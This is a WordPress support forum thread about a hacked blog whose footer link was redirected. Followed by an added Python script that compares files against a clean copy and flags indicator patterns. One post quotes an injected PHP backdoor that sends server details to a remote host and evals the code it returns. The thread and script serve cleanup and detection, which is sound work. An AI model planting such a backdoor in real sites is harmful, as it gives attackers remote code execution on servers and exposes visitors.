WordPress Link got Hacked (16 posts)

  1. koydin
    Member
    Posted 4 years ago #

    One of my friend's footer links got hacked. His Powered by WordPress link points to a different URL instead of wordpress.org. I searched for exploits in his WordPress theme files and found that the hacker used this code to call the hacked URL.

    < ?=@get_wp_results('f');? >

    I can't find the injected code! Where is it, in the database or somewhere else? Need help, guys... I am just a newb...

  2. koydin
    Member
    Posted 4 years ago #

    Any updates?

  3. Shane G.
    Member
    Posted 4 years ago #

    Hi,

    Refer to this article:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    Thanks,

    Shane G.

  4. mrmist
    Forum Janitor
    Posted 4 years ago #

    Some theme authors change the URLs to point to their theme website. Is it a customised theme?

  5. koydin
    Member
    Posted 4 years ago #

    It's a customized theme. It was pointing to wordpress.org before the hack. I searched through the internet and found the hacker injected some .php file with this code:

    <? error_reporting(0);
    $s="e";
    $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
    if((include(base64_decode("...").base64_decode("...")."/?".$str)));
    else if(include(base64_decode("...").base64_decode("...")."/?".$str));
    else if($c=file_get_contents(base64_decode("...").$str))eval($c);
    else{$cu=curl_init(base64_decode("...").$str);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $str=curl_exec($cu);
    curl_close($cu);
    eval($str);
    }; ?>

    I deleted all the files. But his Powered by WordPress link points to a different URL instead of wordpress.org. I think the hacker injected something in the database.

  6. koydin
    Member
    Posted 4 years ago #

    Anyone out there to help me out?

  7. koydin
    Member
    Posted 4 years ago #

    I found some base64 code in wp-admin, and also some new file names. I deleted those files. But no code in the database. Is there any way I can find that?

  8. Robert Chapin
    Member
    Posted 4 years ago #

    Koydin, your server would have to be badly misconfigured for those hacks to run in the first place, since there is no <?php tag in the code. If I were you, I'd start from scratch with a new server environment and a new copy of all the WordPress files.

  9. Windhamdavid
    Member
    Posted 4 years ago #

    Koydin, have you checked out this thread ~ http://wordpress.org/support/topic/370546 ~ it might be simply a matter of removing/editing the affected files from the backdoor ~ http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

  10. Windhamdavid
    Member
    Posted 4 years ago #

    and most of these are likely related to the same problem you may have ~ http://wordpress.org/tags/base64

  11. dassad
    Member
    Posted 4 years ago #

    koydin, can you help me out with this virus? I got hacked like you, but I haven't found the virus until now. Can you send me the code that you found or some help? Thank you. And please hurry, while all my blogs are hacked at this time on that HostGator server.

  12. Can you send me the code that you found or some help.

    You've got a lot of work ahead of you. Here are the boilerplate links for delousing your hacked blog.

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    RVoodoo has written up his experience too.

    http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

    Once you've cleaned out your installation, harden it to stop (or at least slow down) this from happening again.

    http://codex.wordpress.org/Hardening_WordPress

    Good luck.

  13. dassad
    Member
    Posted 4 years ago #

    My problem is that I found the < ?=@get_wp_results('f');? > code only in my footer, but I haven't found anything until now. And it is changing my links but my footer doesn't show up. For example http://7don.com

  14. dassad
    Member
    Posted 4 years ago #

    So I need to find a modified file or something so I can start to hunt it down. But nothing until now. I searched in my database, I downloaded my whole website, and am searching for "eval", "base64" and these types of code in them.

  15. Sorry, but every file in your installation is suspect, as well as your database. That's what it means to be hacked.

    If you want to fix it then you need to replace every file you can with the freshly downloaded original files, hunt through any files you have left, and scour your database.

    Anything less than that won't find it. Once you have found it, then you need to close the door that the attacker came in through.

    It's a metric ton of work but that's what is needed. Once again, good luck. The work is outlined in those links.

  16. dassad
    Member
    Posted 4 years ago #

    Yeah, I understand that, but until I find the modified files I don't want to replace anything. I have now removed the injected code from the footers and I'm waiting to see if it will appear again, however. I still have the virus in my sites. If it's not only injected somehow.
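
Added example, not part of the thread and not any poster's code: one way to find the modified and extra files discussed above is to compare the installed tree byte for byte against a freshly downloaded copy, then check only the differing files for the strings quoted in this thread. The function names, directory names and sample file contents are assumptions constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the snippets quoted in this thread.
INDICATORS = {
    "get_wp_results call": re.compile(r"get_wp_results\s*\("),
    "include of base64-decoded target": re.compile(r"include\s*\(\s*base64_decode\s*\("),
    "eval of a variable": re.compile(r"eval\s*\(\s*\$\w+\s*\)"),
}

def audit(installed, clean):
    """Return {relative path: (status, [indicator names])} for every installed
    file that differs from, or is absent from, the clean reference tree."""
    installed, clean = Path(installed), Path(clean)
    findings = {}
    for f in sorted(p for p in installed.rglob("*") if p.is_file()):
        rel = f.relative_to(installed)
        ref = clean / rel
        if not ref.is_file():
            status = "unknown"      # not shipped in the reference copy
        elif ref.read_bytes() != f.read_bytes():
            status = "modified"     # same path, different content
        else:
            continue                # byte-identical to the reference
        text = f.read_text(errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        findings[rel.as_posix()] = (status, hits)
    return findings

def demo():
    """Audit two small constructed trees (hypothetical paths and contents)."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "theme").mkdir(parents=True)
            (root / "wp-admin").mkdir()
            (root / "theme" / "footer.php").write_text("<p>Powered by WordPress</p>\n")
            (root / "wp-admin" / "index.php").write_text("<?php // core file\n")
        # Constructed tampering modelled on the code posted above.
        (live / "theme" / "footer.php").write_text("<?=@get_wp_results('f');?>\n")
        (live / "wp-admin" / "extra.php").write_text(
            '<? if(include(base64_decode("...")."/?".$str)); else eval($c); ?>\n')
        return audit(live, clean)

if __name__ == "__main__":
    for path, (status, hits) in demo().items():
        print(f"{status:9} {path}  {', '.join(hits) or 'no known indicator'}")
```

A file reported as modified or unknown deserves review even when no indicator matches, since the footer stub contains neither "eval" nor "base64".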
